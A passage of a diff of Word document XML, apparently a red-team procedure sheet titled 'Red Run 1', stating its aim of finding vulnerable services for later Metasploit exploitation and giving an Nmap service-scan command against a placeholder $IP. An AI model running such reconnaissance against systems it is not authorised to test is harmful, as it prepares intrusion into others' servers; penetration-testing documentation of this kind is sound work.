+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Red Run 1</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -133,15 +118,11 @@
           <w:tcPr>
             <w:tcW w:w="3042" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -159,22 +140,18 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="417" w:hRule="atLeast"/>
+          <w:trHeight w:val="417"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -192,42 +169,43 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>Dylan Wondal</w:t>
-            </w:r>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Dylan </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>Wondal</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -246,15 +224,11 @@
           <w:tcPr>
             <w:tcW w:w="3042" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -272,22 +246,18 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="411" w:hRule="atLeast"/>
+          <w:trHeight w:val="411"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -305,15 +275,11 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -331,16 +297,12 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -359,15 +321,11 @@
           <w:tcPr>
             <w:tcW w:w="3042" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -385,22 +343,18 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="411" w:hRule="atLeast"/>
+          <w:trHeight w:val="411"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -418,15 +372,11 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -444,16 +394,12 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2290" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -472,15 +418,11 @@
           <w:tcPr>
             <w:tcW w:w="3042" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -498,21 +440,17 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="1834" w:hRule="atLeast"/>
+          <w:trHeight w:val="1834"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1523" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -528,11 +466,8 @@
           </w:p>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -551,48 +486,56 @@
           <w:tcPr>
             <w:tcW w:w="8121" w:type="dxa"/>
             <w:gridSpan w:val="5"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t xml:space="preserve">This document is to scan a server and find vulnerable services to later be exploited with metasploit </w:t>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">This document is to scan a server and find vulnerable services to later be exploited with </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>metasploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="395" w:hRule="atLeast"/>
+          <w:trHeight w:val="395"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -611,16 +554,12 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -638,16 +577,12 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -665,21 +600,17 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="1735" w:hRule="atLeast"/>
+          <w:trHeight w:val="1735"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -698,112 +629,190 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>Perform an aggressive Nmap scan and enumerate all open ports and their headers to determine if there is the vulnerable service. Look for things like ftp, smb, jenkins installs etc.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-              <w:t>nmap -sC -sV -oN init.scan $IP</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:kern w:val="0"/>
-                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
-              </w:rPr>
-            </w:r>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Perform an aggressive Nmap scan and enumerate all open ports and their headers to determine if there is the vulnerable service. Look for things like ftp, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>smb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>jenkins</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> installs etc.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>sC</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>oN</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t>init.scan</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> $IP</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
+              <w:rPr>
+                <w:kern w:val="0"/>
+                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
+              </w:rPr>
+            </w:pPr>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:jc w:val="center"/>
               <w:rPr>
                 <w:sz w:val="48"/>
                 <w:szCs w:val="48"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="48"/>
-                <w:szCs w:val="48"/>
-              </w:rPr>
-            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="395" w:hRule="atLeast"/>
+          <w:trHeight w:val="395"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="2022" w:type="dxa"/>
             <w:gridSpan w:val="2"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -822,16 +831,12 @@
           <w:tcPr>
             <w:tcW w:w="6342" w:type="dxa"/>
             <w:gridSpan w:val="3"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
                 <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
@@ -849,16 +854,12 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1280" w:type="dxa"/>
-            <w:tcBorders/>
-            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Normal"/>
-              <w:widowControl w:val="false"/>
-              <w:bidi w:val="0"/>
-              <w:spacing w:before="0" w:after="160"/>
-              <w:jc w:val="left"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:spacing w:after="160"/>
               <w:rPr>
                 <w:kern w:val="0"/>
